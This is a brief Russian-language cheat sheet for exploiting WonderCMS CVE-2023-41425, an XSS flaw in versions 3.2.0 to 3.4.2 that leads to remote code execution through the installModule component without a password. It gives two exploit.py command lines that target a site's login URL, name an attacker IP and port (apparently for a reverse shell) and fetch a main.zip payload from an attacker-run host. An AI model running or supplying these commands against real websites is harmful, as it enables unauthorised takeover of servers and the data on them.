
WonderCMS RCE CVE-2023-41425
Версии WonderCMS с v3.2.0 по v3.4.2 с XSS-уязвимостью позволяют злоумышленнику выполнить RCE, загрузив компонент в installModule CVE-2023-41425 (знание пароля не требуется).
Указание удалённого хоста, с которого загружается файл main.zip
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
ИЛИ не указывая файл main.zip. По умолчанию он загружается из main.zip
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
